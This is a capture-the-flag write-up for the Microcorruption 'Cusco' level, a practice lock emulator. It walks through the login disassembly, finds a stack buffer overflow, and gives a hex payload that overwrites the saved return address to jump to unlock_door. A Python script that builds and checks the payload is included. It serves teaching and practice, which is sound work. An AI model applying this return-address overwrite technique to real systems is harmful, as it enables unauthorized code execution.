# 4. Cusco

# Challenge Overview

OVERVIEW

    - We have fixed issues with passwords which may be too long.
    - This lock is attached to the LockIT Pro HSM-1.
---
    This is Software Revision 02. We have improved the security of the
    lock by  removing a conditional  flag that could  accidentally get
    set by passwords that were too long.

Running the program:

Enter the password to continue.
Remember: passwords are between 8 and 16 characters.
> password
That password is not correct.

# Solution

Looking at the assembly:

4500 <login>
4500:  3150 f0ff      add	#0xfff0, sp
4504:  3f40 7c44      mov	#0x447c "Enter the password to continue.", r15
4508:  b012 a645      call	#0x45a6 <puts>
450c:  3f40 9c44      mov	#0x449c "Remember: passwords are between 8 and 16 characters.", r15
4510:  b012 a645      call	#0x45a6 <puts>
4514:  3e40 3000      mov	#0x30, r14
4518:  0f41           mov	sp, r15
451a:  b012 9645      call	#0x4596 <getsn>
451e:  0f41           mov	sp, r15
4520:  b012 5244      call	#0x4452 <test_password_valid>
4524:  0f93           tst	r15
4526:  0524           jz	$+0xc <login+0x32>
4528:  b012 4644      call	#0x4446 <unlock_door>
452c:  3f40 d144      mov	#0x44d1 "Access granted.", r15
4530:  023c           jmp	$+0x6 <login+0x36>
4532:  3f40 e144      mov	#0x44e1 "That password is not correct.", r15
4536:  b012 a645      call	#0x45a6 <puts>
453a:  3150 1000      add	#0x10, sp
453e:  3041           ret

The prologue `add #0xfff0, sp` reserves only 0x10 (16) bytes of stack for the password buffer, but `getsn` is called with a maximum length of 0x30 (48) bytes (`mov #0x30, r14`), so our input can run past the buffer. The saved return address sits directly after the 16-byte buffer: the epilogue at 0x453a does `add #0x10, sp` to drop the buffer and then `ret` pops whatever follows it into the PC. Overflowing the buffer and setting the saved return address to the unlock_door function (0x4446, written little-endian as `46 44`) means 16 bytes of filler followed by the address: `0x41 * 0x10 + 46 44`

414141414141414141414141414141414644

The output still says "That password is not correct.", but when `login` returns, execution lands in unlock_door instead of the caller, and the lock opens.
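The payload above can be built rather than typed by hand. The following script is an added example and is not part of the original writeup; it takes the three values that matter from the disassembly on this page (the `add #0xfff0, sp` frame allocation, the 0x30 byte `getsn` limit, and the 0x4446 address of unlock_door), computes the buffer size, packs the target address little-endian after the filler, checks that the result fits in what `getsn` will read, and models what `ret` pops so the overwrite can be verified before pasting the hex into the debugger. The function and variable names are this example's own.

```python
import struct

# Values taken from the disassembly of <login> on this page
FRAME_ADD_IMM = 0xfff0   # add #0xfff0, sp  (16-bit two's complement: sp -= 0x10)
GETSN_MAX = 0x30         # mov #0x30, r14 before call #0x4596 <getsn>
UNLOCK_DOOR = 0x4446     # address of <unlock_door>


def frame_size(add_imm: int) -> int:
    """Bytes reserved by `add #imm, sp` on the 16-bit MSP430 stack.

    The immediate is a negative number in two's complement, so negating it
    and masking to 16 bits recovers the allocation size (0xfff0 -> 0x10).
    """
    return (-add_imm) & 0xffff


def build_payload(buf_len: int, target: int, filler: int = 0x41,
                  max_len: int = GETSN_MAX) -> bytes:
    """Filler for the whole buffer, then the target address little-endian.

    The two bytes after the buffer are the saved return address, so they are
    what `ret` pops into PC after the epilogue's `add #0x10, sp`.
    Raises ValueError if getsn would truncate the payload.
    """
    payload = bytes([filler]) * buf_len + struct.pack('<H', target)
    if len(payload) > max_len:
        raise ValueError(
            f'payload is {len(payload)} bytes but getsn reads at most {max_len}')
    return payload


def popped_return_addr(stack_bytes: bytes, buf_len: int) -> int:
    """Model the epilogue: skip buf_len bytes of buffer, pop a 16-bit word.

    Returns the address `ret` would jump to for the given stack contents.
    """
    (addr,) = struct.unpack_from('<H', stack_bytes, buf_len)
    return addr


def payload_hex(buf_len: int = frame_size(FRAME_ADD_IMM),
                target: int = UNLOCK_DOOR) -> str:
    """Hex string to paste into the Microcorruption input box (hex mode)."""
    return build_payload(buf_len, target).hex()


if __name__ == '__main__':
    size = frame_size(FRAME_ADD_IMM)
    payload = build_payload(size, UNLOCK_DOOR)
    print(f'buffer size: {size} bytes, getsn limit: {GETSN_MAX} bytes')
    print(f'payload ({len(payload)} bytes): {payload.hex()}')
    print(f'ret will pop: {popped_return_addr(payload, size):#06x}')
```

Running it prints the same 36 hex characters used above; the `popped_return_addr` check is the quick way to catch an endianness mistake (`44 46` instead of `46 44`) before spending a debugger session on it.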

Nice SRP overwrite.